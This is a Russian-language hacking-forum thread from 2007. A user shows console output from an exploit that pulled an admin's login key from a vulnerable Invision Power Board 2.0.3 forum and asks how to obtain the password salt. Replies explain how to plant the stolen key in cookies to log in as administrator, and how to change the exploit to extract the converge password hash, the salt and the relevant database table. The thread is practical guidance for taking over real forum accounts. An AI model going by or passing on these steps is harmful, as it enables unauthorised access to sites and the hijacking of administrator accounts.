Ipb 2.0.3 пасс есть, соли нет

Discussion in 'Песочница' started by GooD and EviL, 28 May 2007.

  1. GooD and EviL

    GooD and EviL Banned

    Joined:
    17 Feb 2007
    Messages:
    79
    Likes Received:
    24
    Reputations:
    0
    всем привет, и так нашёл я уязвимый IPB 2.0.3 сплоитом r57ipb2 выдрал хэш
    Code:
    P:\Perl\exploits\ipb>ipb.pl site.com /forum/ 2 1
    [~]    SERVER : site.com
    [~]      PATH : /forum/
    [~] MEMBER ID : 2
    [~]    TARGET : 1 - IPB 2.*
    [~] SEARCHING PASSWORD ... [ DONE ]
    
    MEMBER ID : 1
    MEMBER_LOGIN_KEY : 50f96222737183fc4aa467b421c08c42
    но салта нет, попробывал сплоит Coyl, но он не сработал и салт я не получил.
    Вопрос: как получить соль?
     
  2. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    это даже не хеш !
    это логин кей, он шифруеться алгоритмом мд5(салт.хеш)- расшифровки без соли не подлежит,
    достаточно не много переписать сплойт и он выдаст соль и хеш.
     
  3. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    То что тебе выдало может быть заменено в кукисах для логина под админом.
    Для других замени member_login_key на converge_pass_hash и converge_pass_salt
     
    1 person likes this.
  4. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    И еще таблицу надо сменить с ibf_members, на ibf_members_converge, ibf стандартный префикс, так что он может быть другой.